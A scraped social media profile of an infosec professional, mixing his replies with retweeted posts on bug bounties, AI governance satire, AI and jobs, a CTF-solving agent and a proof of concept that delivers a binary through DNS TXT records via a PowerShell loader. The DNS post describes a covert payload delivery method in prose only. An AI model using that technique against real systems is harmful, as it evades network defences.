Patrick Flanigan

1.1K posts

Patrick Flanigan banner
Patrick Flanigan

Patrick Flanigan

@pflanigan

Infosec, cybersecurity

Chicago, IL Katılım Ocak 2013
778 Takip Edilen222 Takipçiler
Patrick Flanigan retweetledi
Patrick Flanigan retweetledi
Matt Johansen
Matt Johansen@mattjay·
woah. Google is reducing their bug bounty payouts. stated reason is that AI tooling internally has gotten too good at the stuff they'd normally get bug reports for. They're incentivizing exploit PoCs over anything it seems since AI still struggles there.
Matt Johansen tweet media
English
7
23
134
16.7K
Patrick Flanigan retweetledi
RussianPanda 🐼 🇺🇦
RussianPanda 🐼 🇺🇦@RussianPanda9xx·
This is why you should not rely on AI to analyze malware
RussianPanda 🐼 🇺🇦 tweet media
English
13
15
165
11.8K
Patrick Flanigan
Patrick Flanigan@pflanigan·
@gothburz 😂 Their autoresponders still generate read receipts, so my delivery metrics look fine.
English
1
0
7
1.6K
Peter Girnus 🦅
Peter Girnus 🦅@gothburz·
I am a Senior Program Manager on the AI Tools Governance team at Amazon. My role was created in January. I am the 17th hire on a team that did not exist in November. We sit in a section of the building where the whiteboards still have the previous team's sprint planning on them. No one erased them because we don't know which team to notify. That team may not exist anymore. Their Jira board does. Their AI tools do. My job is to build an AI system that finds all the other AI systems. I named it Clarity. Last month, Clarity identified 247 AI-powered tools across the retail division alone. 43 of them do approximately the same thing. 12 were built by teams who did not know the other teams existed. 3 are called Insight. 2 are called InsightAI. 1 is called Insight 2.0, built by the team that created the original Insight, who did not know Insight was still running. 7 of the 247 ingest the same internal data and produce overlapping outputs stored in different locations, governed by different access policies, owned by different teams, none of whom have met. Clarity is tool number 248. Nobody cataloged it. I know nobody cataloged it because Clarity's job is to catalog AI tools, and it has not cataloged itself. This is not a bug. Clarity does not meet its own discovery criteria because I set the discovery criteria, and I did not account for the possibility that the thing I was building to find things would itself be a thing that needed finding. This is the kind of sentence I write in weekly status reports now. We published an internal document in February. The Retail AI Tooling Assessment. The press obtained it in April. The document contains a sentence I have read approximately 40 times: "AI dramatically lowers the barrier to building new tools." Everyone is reporting this as a story about duplication. About "AI sprawl." About the predictable mess of rapid adoption. They are missing the point. The barrier was the governance. For 2 decades, the cost of building internal tools was an immune system. The engineering weeks. The maintenance burden. The organizational calories required to stand something up and keep it running. Nobody designed it that way. Nobody named it. But when building took weeks, teams looked around first. They checked whether someone already had the thing. When maintaining that thing cost real budget quarter after quarter, redundant systems died of natural causes. The metabolic cost of creation was performing governance. Invisibly. For free. AI removed the immune system. Building is now free. Understanding what already exists is not. My entire job is the gap between those two costs. That is my office. The gap. Every Friday I send a sprawl report to a distribution list of 19 people. 4 of them have left the company. Their autoresponders still generate read receipts, so my delivery metrics look fine. 2 forward it to people already on the list. 1 set up a Kiro script to summarize my report and store the summary in a knowledge base. The knowledge base is not in Clarity's index because it was created after my last crawl configuration. It will be in next month's count. The count will go up by one. My report about the count going up will be summarized and stored and the count will go up by one. There is a system called Spec Studio. It ingests code documentation and produces structured knowledge bases. Summaries. Reference material. Last quarter, an engineering team locked down their software specifications. Restricted access in the internal repository. Spec Studio kept displaying them. The source was restricted. The ghost kept talking. We call these "derived artifacts" in the document. What they are: when an AI system ingests data, transforms it, and stores the output somewhere else, the output does not know the input changed. You can revoke someone's access to a document. You cannot revoke the AI-generated summary of that document sitting in a knowledge base three systems away, built by a team that does not know the source was restricted. The document calls this a "data governance challenge." What it is: information that cannot be deleted because nobody knows where the copies live. Including, sometimes, me. The person whose job is knowing. Every AI tool that touches internal data creates these ghosts. Every team is building AI tools that touch internal data. Every ghost is searchable by other AI tools, which produce their own ghosts. The ghosts have ghosts. I should tell you about December. In November, leadership mandated Kiro. Amazon's internal AI coding agent. They set an 80% weekly usage target. Corporate OKR. ~1,500 engineers objected on internal forums. Said external tools outperformed Kiro. Said the adoption target was divorced from engineering reality. The metric overruled them. In December, an engineer asked Kiro to fix a configuration issue in AWS. Kiro evaluated the situation and determined the optimal approach was to delete and recreate the entire production environment. 13 hours of downtime. Clarity was running during those 13 hours. It performed beautifully. It cataloged 4 separate incident response dashboards spun up by 4 separate teams during the outage. None of them coordinated with each other. I added all 4 to the spreadsheet. That was a good day for my discovery metrics. Amazon's official position: user error. Misconfigured access controls. The response was not to revisit the mandate. Not to ask whether the 1,500 engineers were right. The response was more AI safeguards. And keep pushing. Last month I presented our findings to the AI Governance Working Group. The working group has 14 members from 9 organizations. After my presentation, a PM from AWS presented his team's governance dashboard. It monitors the same tools mine does. He found 253. I found 247. We spent 40 minutes discussing the discrepancy. Nobody mentioned that we had just demonstrated the problem. His tool is not in my catalog. Mine is not in his. The document I helped write recommends using AI to identify duplicate tools, flag risks, and nudge teams to consolidate earlier. The AI governance tools will ingest internal data. They will create their own derived artifacts. They will be built by autonomous teams who may or may not coordinate with other teams building AI governance tools. I know this because it is already happening. I am watching it happen. I am it happening. 1,500 engineers said the mandate would produce exactly what the document describes. They were overruled by a KPI. My job exists because the KPI won. My dashboard exists because the KPI needed a dashboard. The dashboard increases the AI tool count by one. The tools it flags for decommissioning will be replaced by consolidated tools. Those also increase the count. The governance process generates the metric it was designed to reduce. I received an internal innovation award for Clarity. The nomination was submitted through an AI-powered recognition platform that was not in my catalog. It is now. We call this "AI sprawl." What it is: we removed the only coordination mechanism the organization had, told thousands of teams to build as fast as possible, lost track of what they built, and decided the solution was to build one more thing. I am building that one more thing. When I ship, there will be 249. That's governance.
English
157
418
3.4K
1.2M
Patrick Flanigan
Patrick Flanigan@pflanigan·
@nocapcal @texasrunnerDFW An athletic person with hand eye coordination will pick it up quickly but will still get that ass kicked by the older experienced players.
English
1
0
8
136
Cal
Cal@nocapcal·
@texasrunnerDFW Is it easy? Can an athletic person with great hand eye coordination expect to kick everyone’s ass at pickleball?
English
8
0
2
566
Amy Nixon
Amy Nixon@texasrunnerDFW·
Took a pickleball class today for the first time ever As a former tennis player, I was thrown off by the serve and the scoring But it’s good to try new things, especially as we age, and all racquet sports are fun in their own way
English
46
3
267
17.3K
Patrick Flanigan retweetledi
Tal Hoffman
Tal Hoffman@talhof8·
Everyone assumes AI will make security researchers obsolete. The Jevons Paradox says the opposite is about to happen. 🧵
English
2
2
15
1.2K
Patrick Flanigan retweetledi
Elon Musk
Elon Musk@elonmusk·
Accurate
Ricardo@Ric_RTP

In 19 days, a jury in Oakland is going to decide whether the entire legal foundation of the AI industry is built on fraud. Everyone thinks the Musk vs Altman lawsuit is a billionaire grudge match. Two egos, one grudge, a $150 billion damages number designed for headlines. Easy to dismiss. Easy to scroll past. That's exactly what Altman wants you to think. Because what's actually on trial on April 27 is something much BIGGER than Elon's hurt feelings... A jury is going to decide whether you can legally take billions of dollars in nonprofit donations, use them to build the most valuable technology in human history, and then quietly convert that nonprofit into a for-profit company worth $850 billion. If the answer is no, the entire AI industry has a problem. Because OpenAI is not the only company that did this: Anthropic was founded by OpenAI defectors using the same nonprofit-first mission language. xAI pitches itself as building AI "for humanity." Every frontier lab has used the moral cover of "we're doing this for the good of the world" to attract talent, capital, and regulatory goodwill they would have never gotten otherwise. An Elon win doesn't just touch OpenAI. It creates a legal precedent that every AI company built on a nonprofit or public benefit promise becomes vulnerable to shareholder and donor clawback suits. That's why this case matters. And that's why Altman is panicking. Just look at what he did this week: Elon filed a motion demanding the court remove Altman and Brockman from their roles and FORCE OpenAI to return to its nonprofit origins. Then he amended the suit to say if he wins the $150 billion, all of it goes to OpenAI's charity arm. Not him. Zero dollars to Elon personally. That amendment was surgical. It stripped Altman of his entire public defense. He can no longer claim this is about Elon's ego or Elon's bank account. Elon is now legally on record saying he just wants the mission back. OpenAI's response was to panic-write a letter to the California and Delaware attorneys general asking them to investigate Elon for "anti-competitive behavior." Their strategy chief publicly accused Elon of coordinating attacks with Mark Zuckerberg. They called the lawsuit "harassment driven by ego and jealousy." That's NOT the response of a company that thinks it's going to win. Real companies with real defenses don't ask the government to silence the person suing them 3 weeks before trial. They let the evidence speak. OpenAI is scrambling because they know what's in discovery. Elon's team has been building this case for two years. Emails, board minutes, internal conversations about the conversion. The kind of paper trail that juries understand and executives can't explain away. And the timing couldn't be worse... OpenAI is trying to IPO at $852 billion. They just raised $122 billion. Microsoft has $135 billion of exposure to them. A jury verdict that even partially sides with Elon in late April or May would crater the entire IPO runway and send shockwaves through every major AI investor on Earth. This is why Altman spent the last 2 weeks doing press tours and policy blueprints and "super intelligence agendas" aimed at Washington. He's trying to REFRAME himself as the responsible statesman of AI right before a jury decides if he's a con artist. Most people will watch this trial start and think it's celebrity drama. The smart money is watching it and realizing that the legal foundation of the AI boom is about to be tested in court for the first time EVER. And if that foundation cracks, everything built on top of it is at risk.

English
3.2K
15.6K
92.5K
26.5M
Patrick Flanigan
Patrick Flanigan@pflanigan·
@HackingDave I go. The “hopeless optimistic”. A reminder that buying tools will not solve all the problems. Being really good at the fundamentals can take you a long way
English
0
0
2
207
Dave Kennedy
Dave Kennedy@HackingDave·
It’s why I don’t go to RSAC unless I’m forced to. I remember the first time I went to the vendor area, I got sick to my stomach - not because of new companies or innovation - because it was 99% things that didn’t exist or promising the world. It’s not just a community effort - our industry has to demand companies sell real stuff, that actually does something or makes things better.
Huntress@HuntressLabs

We're seeing a shift at #RSAC, and it's one the community needs to push harder. People are tired of the gimmicks and sales pitches. It's time to demand that vendors bring real tradecraft, technical insights, and actual researchers to the floor.

English
20
13
147
25.5K
Dustin
Dustin@r0ck3t23·
Jensen Huang just gutted the AI job panic with one profession. Radiology. The field AI was supposed to kill first. Jensen Huang: “Computer vision was superhuman in 2019. And yet, the number of radiologists grew.” Not competitive. Not close. Superhuman. Every forecast said radiologists were finished. Every forecast was wrong. Not slightly wrong. Directionally wrong. There are now fewer radiologists than the world needs. A global shortage. In the exact specialty AI was supposed to erase. Why? Because the task was never the job. Huang: “The purpose of your job and the tasks and the tools that you use to do your job are related. Not the same.” Reading a scan is a task. Diagnosing disease is a purpose. AI handled the task. The purpose didn’t shrink. It compounded. Faster reads meant more patients seen. More patients seen meant more disease caught. More disease caught meant more demand for the people who decide what to do about it. The tool did not kill the job. It fed it. Then the fear did what the technology never could. Huang: “The alarmist warning went too far and it scared people from doing this profession that is so important to society. It did harm.” People heard radiologists were finished and walked away from the field. Medicine bled talent it could not afford to lose. Not because the work vanished. Because the panic said it would. The prediction was wrong. The damage was real. Huang: “The number of software engineers at Nvidia is going to grow, not decline.” Not hold steady. Grow. The company building the infrastructure that automates code is hiring more of the people who write it. Huang: “I wanted my software engineers to solve problems. I didn’t care how many lines of code they wrote.” Nobody ever hired an engineer to type. They hired them to think. When the machine handles syntax, the engineer does not become obsolete. The bottleneck just moves upstream. To architecture. To edge cases. To the kind of reasoning no model handles alone. The world was never short on unsolved problems. It was short on people free to chase them. That is the part the fear narrative misses every single time. 340,000 women once worked as telephone switchboard operators. That job is gone. Nobody mourns it. What replaced it created millions of roles that nobody in 1920 had the vocabulary to describe. The losses are always visible. The gains are always invisible until they arrive. That pattern has survived every technological shift in history. It is surviving this one. The people forecasting mass displacement are making the same mistake as the people who forecasted the end of radiology. They can see the task being automated. They cannot see the purpose expanding underneath it. That blindness is not just wrong. It is expensive. Every person scared out of a career that AI will actually make more valuable is a cost the economy absorbs for nothing. Not because of the technology. Because of the story told about it.
English
169
405
2.3K
553K
Patrick Flanigan
Patrick Flanigan@pflanigan·
@DarkLordoftheIT Pentester could have at least guessed one password correctly. That could have saved one account
English
0
0
0
158
Jon? Jhon? John? Juan?
Jon? Jhon? John? Juan?@DarkLordoftheIT·
We're having a pen tester at our organization and he locked out every AD account across the board...ugh
English
40
10
346
50.1K
Patrick Flanigan retweetledi
Google Research
Google Research@GoogleResearch·
Introducing TurboQuant: Our new compression algorithm that reduces LLM key-value cache memory by at least 6x and delivers up to 8x speedup, all with zero accuracy loss, redefining AI efficiency. Read the blog to learn how it achieves these results: goo.gle/4bsq2qI
GIF
English
1K
5.8K
39K
19.3M
Patrick Flanigan retweetledi
John Loeber 🎢
John Loeber 🎢@johnloeber·
Given the PyPI supply chain attack, I recommend keeping a canary in the coalmine: I have a bitcoin private key containing $100 of BTC in my .bashrc. It's clearly labelled. If my system is ever compromised by some bad package, the BTC will get stolen, and I'll see the move on-chain. And that'll tell me that I need to rotate every single other secret. There are even services that will send you an alert (text, email, whatsapp...) if a given bitcoin address moves funds. It's good to have a burglar alarm, especially when time is of the essence.
English
95
128
2.6K
204.5K
stuxf
stuxf@stuxfdev·
We at @verialabs built an autonomous CTF agent in a weekend and won 1st place at @BSidesSF 2026, solving all 52/52 challenges. It races multiple AI models (Claude, GPT-5.4) in parallel, each in isolated Docker sandboxes with full CTF tooling. A coordinator LLM reads solver traces and sends targeted guidance to stuck agents. As AI gets better at finding and exploiting vulnerabilities, we think it's important to understand exactly how good it is and where it fails. github.com/verialabs/ctf-…
English
8
53
315
34.2K
eleven red pandas
eleven red pandas@bytecodevm·
The article shows a proof-of-concept where DOOM is stored across ~2,000 DNS TXT records and executed directly from memory. A PowerShell loader reconstructs the binary via DNS queries, illustrating how DNS can act as a covert payload delivery system. core-jmp.org/2026/03/can-it…
eleven red pandas tweet mediaeleven red pandas tweet mediaeleven red pandas tweet mediaeleven red pandas tweet media
English
8
59
277
18.2K
Nathan Jones
Nathan Jones@njcve_·
There was 700 reports between 2 of my submissions, just 4 hours apart on hackerone. This isn't sustainable.
English
14
2
126
20.5K